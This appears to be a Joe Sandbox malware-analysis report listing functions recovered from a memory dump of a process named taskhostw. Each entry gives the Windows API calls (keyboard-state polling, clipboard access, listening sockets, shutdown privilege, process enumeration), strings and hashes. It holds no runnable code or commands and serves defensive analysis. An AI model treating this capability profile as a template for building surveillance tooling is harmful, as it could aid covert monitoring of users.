Opcode ID: 6591c480982fcd237acd8d0823af5b200258dc51ba42dfcc92883275d99db967
Instruction ID: d21994a3a84f19c052cdfc27cd96a9fac5242ce4c71c15cfe874998ac904f498
Opcode Fuzzy Hash: 6591c480982fcd237acd8d0823af5b200258dc51ba42dfcc92883275d99db967
Instruction Fuzzy Hash: BF724C75E002199BDB14CF59D8507AEB7B5FF48710F18816AE859EB290EB70DE81CBB0

Function 00D70465 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D70EA5: CharUpperBuffW.USER32(?,?), ref: 00D70EBC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D70537

Part of subcall function 00CF9997: __itow.LIBCMT ref: 00CF99C2
Part of subcall function 00CF9997: __swprintf.LIBCMT ref: 00CF9A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D705D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00D7066E
RegCloseKey.ADVAPI32(000000FE), ref: 00D708AD
RegCloseKey.ADVAPI32(00000000), ref: 00D708BA

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: f45238902f8363b5fbe797d72795a98bc7a7389d7bcd962ca4e52a7613194cbd
Instruction ID: 5f21bf5fba9e79372c82eda9623d697f152880e55acaf2935e993f5411b0d04f
Opcode Fuzzy Hash: f45238902f8363b5fbe797d72795a98bc7a7389d7bcd962ca4e52a7613194cbd
Instruction Fuzzy Hash: 4CE14D71204214EFCB14DF24C891E6ABBE5EF89714F04C56DF58ADB2A2DB30E941CB62

Function 00D5003A Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00D50062
GetAsyncKeyState.USER32 ref: 00D500E3
GetKeyState.USER32(000000A0), ref: 00D500FE
GetAsyncKeyState.USER32 ref: 00D50118
GetKeyState.USER32(000000A1), ref: 00D5012D
GetAsyncKeyState.USER32 ref: 00D50145
GetKeyState.USER32(00000011), ref: 00D50157
GetAsyncKeyState.USER32 ref: 00D5016F
GetKeyState.USER32(00000012), ref: 00D50181
GetAsyncKeyState.USER32 ref: 00D50199
GetKeyState.USER32(0000005B), ref: 00D501AB

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 69d9e4a2f86476bd9cc8b4c0f81d09e6e3f414b05ab749fc231a0d72773b9349
Instruction ID: 603b9acbfa8e644c528cd288e889f784bcd962f0f9c9fce6925260c993880bb1
Opcode Fuzzy Hash: 69d9e4a2f86476bd9cc8b4c0f81d09e6e3f414b05ab749fc231a0d72773b9349
Instruction Fuzzy Hash: 93417524A04BCA69FF319B64C814BA5BEA16F11346F0C4499DDC6876C2EB9499CC87B3

Function 00D684D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00CF9997: __itow.LIBCMT ref: 00CF99C2
Part of subcall function 00CF9997: __swprintf.LIBCMT ref: 00CF9A0C

CoInitialize.OLE32 ref: 00D68518
CoUninitialize.OLE32 ref: 00D68523
CoCreateInstance.OLE32(?,00000000,00000017,00D82BEC,?), ref: 00D68583
IIDFromString.OLE32(?,?), ref: 00D685F6
VariantInit.OLEAUT32(?), ref: 00D68690
VariantClear.OLEAUT32(?), ref: 00D686F1

Strings

Failed to create object, xrefs: 00D6858E, 00D68644
NULL Pointer assignment, xrefs: 00D685C8
Invalid parameter, xrefs: 00D6860F

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 7dd2e6e7c1d1e70d12f298b939ddb70dcf97d84c4d538af76c4ccd12d77663a6
Instruction ID: ddb31100ef6d27702e498de7f76613b36399e15a00af8bdcf79cc86b1a7ecae0
Opcode Fuzzy Hash: 7dd2e6e7c1d1e70d12f298b939ddb70dcf97d84c4d538af76c4ccd12d77663a6
Instruction Fuzzy Hash: 48618E702083119FDB10DF64C849B6ABBE8EF49714F144A1DF9869B291DB70ED48DBB2

Function 00D6427A Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00D642A1
EmptyClipboard.USER32 ref: 00D642A7
GlobalAlloc.KERNEL32(00000002,?), ref: 00D642BC
CloseClipboard.USER32 ref: 00D6435B

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 331d9570355cc55648fd8895af27b8c5280f40ac33996c6c6845ce6143ed8fd3
Instruction ID: ecccf394c095d031e7e86263210a3a92c634731e0db79bd8eb0c2cc5d972717c
Opcode Fuzzy Hash: 331d9570355cc55648fd8895af27b8c5280f40ac33996c6c6845ce6143ed8fd3
Instruction Fuzzy Hash: 74216D35201610AFDB20AF60EC49B6D77A9EF44711F14802AF94ADB3A1EB30AD41DB79

Function 00D04140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00D37A3B
VUUU, xrefs: 00D044ED
VUUU, xrefs: 00D04520
VUUU, xrefs: 00D044DB
ERCP, xrefs: 00D0421F

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 11e80fdada9d23f30171c4c309d52ff3a8db54a5708a493b6976f263193fc901
Instruction ID: a355f07b18b51959e0385f5aef4c9d7dabca7b868dfa266b57d4b318a2c941eb
Opcode Fuzzy Hash: 11e80fdada9d23f30171c4c309d52ff3a8db54a5708a493b6976f263193fc901
Instruction Fuzzy Hash: 42A27FB0E0461ACBDF34CF58C990BADB7B1BF54314F1881A9E959A7280E7709D85DFA0

Function 02A94CC0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 02A94E05
_memmove.LIBCMT ref: 02A94E55
_memmove.LIBCMT ref: 02A94EBB

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 837f325ad964d4244a1dbd246846212314ca8241948a41978c0ca760d4cf362a
Instruction ID: 7ef33ff55bf783f6e5ed56324f20d4a3eae0bfb6f2b8fc4f9d79cd1e0bbd84d2
Opcode Fuzzy Hash: 837f325ad964d4244a1dbd246846212314ca8241948a41978c0ca760d4cf362a
Instruction Fuzzy Hash: 70127D70A006099FDF14DFA9DA80AEEB7F6FF48304F20456AE806E7650EF35A915CB54

Function 00D55264 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00D48AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D48AED
Part of subcall function 00D48AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D48B1A
Part of subcall function 00D48AA3: GetLastError.KERNEL32 ref: 00D48B27

ExitWindowsEx.USER32(?,00000000), ref: 00D552A0

Strings

@, xrefs: 00D55293
SeShutdownPrivilege, xrefs: 00D55270
, xrefs: 00D5528E

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 4a2aa05485337b0e867dd73b5f49ca22c0a0e6d4e868e3923c6f0ab0f9e0ff56
Instruction ID: 7354771aee976709ebab493ec361efacd16afcc02d967fdc2e16d74822b50eb1
Opcode Fuzzy Hash: 4a2aa05485337b0e867dd73b5f49ca22c0a0e6d4e868e3923c6f0ab0f9e0ff56
Instruction Fuzzy Hash: AE014C306917116FEF291268FC67BBA7258EB05343F280121FC47D14D6E9505C0887B8

Function 00D66399 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00D663F2
WSAGetLastError.WSOCK32(00000000), ref: 00D66401
bind.WSOCK32(00000000,?,00000010), ref: 00D6641D
listen.WSOCK32(00000000,00000005), ref: 00D6642C
WSAGetLastError.WSOCK32(00000000), ref: 00D66446
closesocket.WSOCK32(00000000,00000000), ref: 00D6645A

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 8325ed203f0e73f4d07c8dc221c2ef0e9c445c732bdf7a6234a0d334cc54709a
Instruction ID: 0f76d1d71446226010c033d3b9df049d2105222a4f0150d99e089f4ca5333913
Opcode Fuzzy Hash: 8325ed203f0e73f4d07c8dc221c2ef0e9c445c732bdf7a6234a0d334cc54709a
Instruction Fuzzy Hash: 68219C34600204AFCB10EF64C945B7EB7A9EF44720F188169FA5AE7392DB70ED41DB62

Function 02A8F240 Relevance: 8.0, APIs: 3, Strings: 1, Instructions: 1040COMMON

Download Yara Rule

Strings

pbL, xrefs: 02AC4112

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID:
String ID: pbL
API String ID: 0-2198975964
Opcode ID: cb8729c52343b53710d90e753b25f9369214f47dccec846f2bc71a0ac487be56
Instruction ID: 94a12a1a89b090e371f969b3ea34251d16e39f6080cb5cbfce50e92c990d8a2a
Opcode Fuzzy Hash: cb8729c52343b53710d90e753b25f9369214f47dccec846f2bc71a0ac487be56
Instruction Fuzzy Hash: C2928A706083428FD720EF14C590B2ABBF1BF88314F54896DE99A8B751DB75E845CF92

Function 02A94A80 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 02AA0336: std::exception::exception.LIBCMT ref: 02AA036C
Part of subcall function 02AA0336: __CxxThrowException@8.LIBCMT ref: 02AA0381

_memmove.LIBCMT ref: 02ACF9AE
_memmove.LIBCMT ref: 02ACFAC3
_memmove.LIBCMT ref: 02ACFB6A

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: e83a155bf61ab41bcb8dfa51c36b184f9cdf33b0d0cfab516184054cc245601c
Instruction ID: ff1c4de91290812b92f7cb7ad835934dbdbd6b8a8f852f1923d1f7b840e552a2
Opcode Fuzzy Hash: e83a155bf61ab41bcb8dfa51c36b184f9cdf33b0d0cfab516184054cc245601c
Instruction Fuzzy Hash: 0B028170A00205DFDF04DF65DA91AAEBBF6EF48304F2480AAE806DB254EF31D955CB95

Function 00CF1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00CF2612: GetWindowLongW.USER32(?,000000EB), ref: 00CF2623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00CF19FA
GetSysColor.USER32(0000000F,?,?), ref: 00CF1A4E
SetBkColor.GDI32(?,00000000), ref: 00CF1A61

Part of subcall function 00CF1290: DefDlgProcW.USER32(?,00000020,?), ref: 00CF12D8

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 33d9a19c2e4fa2739f8e6be35abd8e891a8251731c07df4776eff63b5bb0d7c0
Instruction ID: b9d541e59cd7c991925aac669842830b8c5e98e8508643f3eb3ff44b25a71bea
Opcode Fuzzy Hash: 33d9a19c2e4fa2739f8e6be35abd8e891a8251731c07df4776eff63b5bb0d7c0
Instruction Fuzzy Hash: 18A18B7011655CFED678AB29AC44E7F369CDF41365B1C020AFE22D2186DBA1DE01A2B3

Function 00D6685D Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00D67EA0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00D67ECB

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00D668B4
WSAGetLastError.WSOCK32(00000000), ref: 00D668DD
bind.WSOCK32(00000000,?,00000010), ref: 00D66916
WSAGetLastError.WSOCK32(00000000), ref: 00D66923
closesocket.WSOCK32(00000000,00000000), ref: 00D66937

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: aeb7fbd0fc90a0bb1c89e55fd2e4bed87e874339b8983d8e544701d43f741942
Instruction ID: 6a238417c05f813a6ba520dfb1ec20d8d072ec3ee7d721bee5e46b70b0b68638
Opcode Fuzzy Hash: aeb7fbd0fc90a0bb1c89e55fd2e4bed87e874339b8983d8e544701d43f741942
Instruction Fuzzy Hash: FC41F775A00214AFEF50AF64CC86F3E77A9DF44710F44805CFA5AAB3C2DA709D009BA2

Function 00D753DF Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00D7542E
IsWindowEnabled.USER32 ref: 00D7543C
GetForegroundWindow.USER32 ref: 00D75449
IsIconic.USER32 ref: 00D75457
IsZoomed.USER32 ref: 00D75465

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 7c8502ec50a0fb586c9bc19f3d759348b440de42e68c0338c3c8e0ef6b0618d4
Instruction ID: 28ed65462a74a85f6d47dca333522a431fac609e9f7c04aaee37dc84032df031
Opcode Fuzzy Hash: 7c8502ec50a0fb586c9bc19f3d759348b440de42e68c0338c3c8e0ef6b0618d4
Instruction Fuzzy Hash: 211108317006156FD7205F26EC44B2E7798FF44326B088428F44ED7251EBB0DD8186B7

Function 00D6C104 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 00D6C112
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW,?,00D31CB7,?), ref: 00D6C124

Strings

GetSystemWow64DirectoryW, xrefs: 00D6C11E
kernel32.dll, xrefs: 00D6C10D

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: afd0d66c85ce63c9b8857b9b21995bce59ca651f7c8f801c95c109dd36e302bc
Instruction ID: 1a1bc16d88d9f991bcefc940447775c2898d77973ff8588a30830e0bc8d1dedc
Opcode Fuzzy Hash: afd0d66c85ce63c9b8857b9b21995bce59ca651f7c8f801c95c109dd36e302bc
Instruction Fuzzy Hash: 81E0EC78610723DFDB309F29D818B6276E4EF1A759B849439E889D2250F77CD884CB70

Function 00D03190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: dff75920abd5bfbdad9fcd44ab958c7e1cc073ecfe3ea082d6c3587c9f382782
Instruction ID: cee328d4779e28c806aae71019af9e9b3c59034bb42fda0a07083013b265d30d
Opcode Fuzzy Hash: dff75920abd5bfbdad9fcd44ab958c7e1cc073ecfe3ea082d6c3587c9f382782
Instruction Fuzzy Hash: 622279716087019FC724DF24C881BAFB7E8EF84700F14492DF99A97291DB71EA44CBA2

Function 02A92590 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 3aaad38bc9680bd309ab71f568fa4dd4e9a0c6b95244753d1c78f3977fd1c336
Instruction ID: af58648dac8d770b2443fe15fa7cc1efced017b292b0169020a10771fd24c442
Opcode Fuzzy Hash: 3aaad38bc9680bd309ab71f568fa4dd4e9a0c6b95244753d1c78f3977fd1c336
Instruction Fuzzy Hash: C9229B71508301AFCB24EF25C990B6EB7E5BF88714F50492DE99A97290DF35E904CF92

Function 00D6EF21 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00D6EF51
Process32FirstW.KERNEL32(00000000,?), ref: 00D6EF5F

Part of subcall function 00CF7F41: _memmove.LIBCMT ref: 00CF7F82

Process32NextW.KERNEL32(00000000,?), ref: 00D6F01F
CloseHandle.KERNEL32(00000000), ref: 00D6F02E

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: ab62a7ac0c493ee5fd43dcfffdde9942994012541c4cdfd7bfc3307ca949f212
Instruction ID: aa97ba1934a91a7389e04bd847d1a11817e8120a9769ed8d28b4abba47683402
Opcode Fuzzy Hash: ab62a7ac0c493ee5fd43dcfffdde9942994012541c4cdfd7bfc3307ca949f212
Instruction Fuzzy Hash: 2651AF71508705AFD750EF20DC81E6BB7E8FF88700F14492DF69587291EB70A908DBA2

Function 00D4E928 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00D4E93A

Strings

(, xrefs: 00D4E980
|, xrefs: 00D4E96A

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 72d1a6511dc9846432604306504618bf279d43917cef82ed76471f65374975d0
Instruction ID: f933d0c142f8849c6ec4af281b461330c41277b3ef3c9bfb08b6fada8ad2f19c
Opcode Fuzzy Hash: 72d1a6511dc9846432604306504618bf279d43917cef82ed76471f65374975d0
Instruction Fuzzy Hash: 2C321675A00705AFC728DF19C48196AB7F1FF48320B15C56EE89ADB3A1E770E981CB54

Function 00D5B3BF Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00D5B3CF
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00D5B429
